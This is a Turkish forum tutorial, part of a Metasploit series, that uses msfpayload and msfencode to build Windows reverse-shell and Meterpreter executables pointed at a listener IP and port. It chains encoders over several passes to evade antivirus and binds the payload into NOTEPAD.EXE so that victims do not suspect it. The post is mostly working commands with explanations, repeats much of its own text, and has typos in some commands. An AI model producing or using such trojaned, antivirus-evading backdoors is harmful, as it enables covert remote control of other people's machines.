J
JFO
Sa İMT ailesi bugün metaploit serimizin 4 bölümündeyiz bu bölümde msfpayload,msfencode,msfvenom,msfcli bahsedicem biraz karışık konular bunlar
ama metasploitin olmassa olmazları diyebilirz hemen Konuya geçelim
ama metasploitin olmassa olmazları diyebilirz hemen Konuya geçelim
Revealed content
MSFPAYLOAD NEDİR ?
Msfpayload metasploitte payload oluşturma işlemni yapan arkadaşımızdır php,exe,java,perl vb. dillerde payload oluşturabiliyoruz bu arkadaşla
MSFENCODE NEDİR ?
Günümüz Şartlarında Güvenlik Hat Safada Olduğu İçin Hazırladığımız payloadlar antivirüsler tarafından tesspit edilip siliniyo silinmemesi için msfencode kullanıcaz
aslında msfencode bi sike yaradağı yok msfencode ile kriptolanan payloadlar antivirsüler artık tanyo eskiden böyle bi durum yokdu eee o zman niye bunu anlatıyon amk diyebilirsiniz ama demeyin
çünkü bunada bi çar bulduk msfencode ile yetinmiyip farklı methodlar uygılayark antivirüsler tarafından tanınmaasını en aza indiricez
msfencode daha verimli olması için payload oluşturma aşamasında kullanılması daha iyi oluyo bazı sorunlar çıkıyo bunları engellemek için payload oluşturma sürecinde msfencodeyi kullanıcaz
MSFVENOM NEDİR ?
Msfvenom ise msfpayload ile msf encodein birleştirilmiş hali bu yüzden bunuda enlatmıyacam zaten tr de msfvenom anlatan bi kaç kaynak vardır
MSFCLİ NEDİR ?
Msfcli içinde metasploiti açamk zor gelenler için ufak tefek payloadlar falan var Üşenen Adam Zaten Bu işlerle uğraşmaz o yüzden anlatmıyacam
PAYLOAD OLUŞTURMAK
bu komut ile parametleri ve oluşturcağım payloadun hangi dilde olucağını belilemk için parametreler var
örnek olarak e [X] e yazıyo exe şeklinde bi payload oluşturrken dosya tipini belirtmek için X yazıcaz
Bu Komut İle payloadları görüntülüyoruz
sıra geldi payload hakkında bilgi almaya
bu komut ile parametreleri görüntülüyoruz LHOST LPORT gibi
Sıra geldi payload oluşturmaya
Genel Olarak Payload Böyle Oluşuyo Başta Dediğim Gibi LPORT tan sonra yazdığımız X dosya tipini ifade ediyo buraya kadar herşey güzeldi burdan sonrası biraz karışık
NOT: Antivirüsler tarafından Tanınması en az olan dil pythondur
PAYLOAD OLUŞTURUP ENCODE ETMEK
Bu Komutu ile tüm parametreleri görebilirsiniz
Bu Komut ile encoder leri görüyoruz
şimdik payload la birlikte encode işlemine
İlk Bakışta Bune Amk Diyebilirsiniz Sakin Olun Şimdik Kodu Açalım Biraz msfpayloaddan normal bir payload şeçtik "|" ile ayırıp msfencode yazıp parametreli dolduruyoeuz "-e" ile şeçip "c" ile üzerine yazılacak süreyi şeçiyoruz Bu rakam ne kadar yüksek tutulursa encoder üzerinde o kadar kripto işlemi gerçekleştirilir fakat ne kadar çokkripto işlemi yaparsak o kadar dosya boyuru büyür ve hedef şüphelenme olaşılığı artar.Uzantı olark "-t" raw belirtiryoruz.Bu tür işlemlerde raw belirtmek en uygunudur bu şekilde istediğiniz kadar encoder yapabilirsiniz ama 4-5 geçmeyin geçdiğiniz zaman genllikle payload bozuluyo payload düzgün çalışmıyo
Eve böyle encode ederk antivirüsleri tanınma olasalığını azalltık ama yetermi yetmez
şimidk oluşturduğumuz payloadu hazı bi programla birleştircez notdefteri yani .txt , .jpg ,.mp3 formtalarla birleştirecez
Bu Koduda Açıklıyalım payloadı şeçtik sonra msfencode "-e" encoder şeçtik birleştirceğimiz dosyayı "-x" olarak belirtiyoruz "-k" ile ekliyoruz sonra oluşturcak dosyanın yolunu belirtmek için "-o" ile yolu gösteriyoruz
bu şekilde payloadmız notepad ile birleştirip payloadımızn tanınmasını ve antivirüsler tarafından anlaşılmasını azaltıyoruz
evet arkadaşlar bu konuda bitmiştir şağlıcakla kalın
Msfpayload metasploitte payload oluşturma işlemni yapan arkadaşımızdır php,exe,java,perl vb. dillerde payload oluşturabiliyoruz bu arkadaşla
MSFENCODE NEDİR ?
Günümüz Şartlarında Güvenlik Hat Safada Olduğu İçin Hazırladığımız payloadlar antivirüsler tarafından tesspit edilip siliniyo silinmemesi için msfencode kullanıcaz
aslında msfencode bi sike yaradağı yok msfencode ile kriptolanan payloadlar antivirsüler artık tanyo eskiden böyle bi durum yokdu eee o zman niye bunu anlatıyon amk diyebilirsiniz ama demeyin
çünkü bunada bi çar bulduk msfencode ile yetinmiyip farklı methodlar uygılayark antivirüsler tarafından tanınmaasını en aza indiricez
msfencode daha verimli olması için payload oluşturma aşamasında kullanılması daha iyi oluyo bazı sorunlar çıkıyo bunları engellemek için payload oluşturma sürecinde msfencodeyi kullanıcaz
MSFVENOM NEDİR ?
Msfvenom ise msfpayload ile msf encodein birleştirilmiş hali bu yüzden bunuda enlatmıyacam zaten tr de msfvenom anlatan bi kaç kaynak vardır
MSFCLİ NEDİR ?
Msfcli içinde metasploiti açamk zor gelenler için ufak tefek payloadlar falan var Üşenen Adam Zaten Bu işlerle uğraşmaz o yüzden anlatmıyacam
PAYLOAD OLUŞTURMAK
Kod:
msfpayload -h
bu komut ile parametleri ve oluşturcağım payloadun hangi dilde olucağını belilemk için parametreler var
örnek olarak e [X] e yazıyo exe şeklinde bi payload oluşturrken dosya tipini belirtmek için X yazıcaz
Kod:
msfpayload -l
Bu Komut İle payloadları görüntülüyoruz
sıra geldi payload hakkında bilgi almaya
Kod:
msfpayload (payload_ismi) 0
Örnek Olarak
msfpayload windows/shell_reverse_tcp 0
bu komut ile parametreleri görüntülüyoruz LHOST LPORT gibi
Sıra geldi payload oluşturmaya
Kod:
msfpayload (payload_isim) LHOST=İP LPORT=PORT x > /dizin/dosyadı.exe
örnek olarak
msfpayload windows/shell_reverse_tcp LHOST=192.168.5.107 LPORT=4444 x > /root/Desktop/shell.exe
Genel Olarak Payload Böyle Oluşuyo Başta Dediğim Gibi LPORT tan sonra yazdığımız X dosya tipini ifade ediyo buraya kadar herşey güzeldi burdan sonrası biraz karışık
NOT: Antivirüsler tarafından Tanınması en az olan dil pythondur
PAYLOAD OLUŞTURUP ENCODE ETMEK
Kod:
msfencode -h
Kod:
msfencode -l
şimdik payload la birlikte encode işlemine
Kod:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.107 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 3 -t raw | msfencode -e 3-t exe > /root/Desktop/multi.exe
İlk Bakışta Bune Amk Diyebilirsiniz Sakin Olun Şimdik Kodu Açalım Biraz msfpayloaddan normal bir payload şeçtik "|" ile ayırıp msfencode yazıp parametreli dolduruyoeuz "-e" ile şeçip "c" ile üzerine yazılacak süreyi şeçiyoruz Bu rakam ne kadar yüksek tutulursa encoder üzerinde o kadar kripto işlemi gerçekleştirilir fakat ne kadar çokkripto işlemi yaparsak o kadar dosya boyuru büyür ve hedef şüphelenme olaşılığı artar.Uzantı olark "-t" raw belirtiryoruz.Bu tür işlemlerde raw belirtmek en uygunudur bu şekilde istediğiniz kadar encoder yapabilirsiniz ama 4-5 geçmeyin geçdiğiniz zaman genllikle payload bozuluyo payload düzgün çalışmıyo
Eve böyle encode ederk antivirüsleri tanınma olasalığını azalltık ama yetermi yetmez
şimidk oluşturduğumuz payloadu hazı bi programla birleştircez notdefteri yani .txt , .jpg ,.mp3 formtalarla birleştirecez
Kod:
msfpayload winodws/meterpreter/reverse_tcp LHOST=192.168.2.103 LPOR=4444 R | msfencode -t exe -x /root/Desktop/NOTEPAD.EXE -k -o /root/Desktop/sonucmsf.exe -e x86/shikata_ga_nai -c 2
Bu Koduda Açıklıyalım payloadı şeçtik sonra msfencode "-e" encoder şeçtik birleştirceğimiz dosyayı "-x" olarak belirtiyoruz "-k" ile ekliyoruz sonra oluşturcak dosyanın yolunu belirtmek için "-o" ile yolu gösteriyoruz
bu şekilde payloadmız notepad ile birleştirip payloadımızn tanınmasını ve antivirüsler tarafından anlaşılmasını azaltıyoruz
evet arkadaşlar bu konuda bitmiştir şağlıcakla kalın
Moderatör tarafında düzenlendi: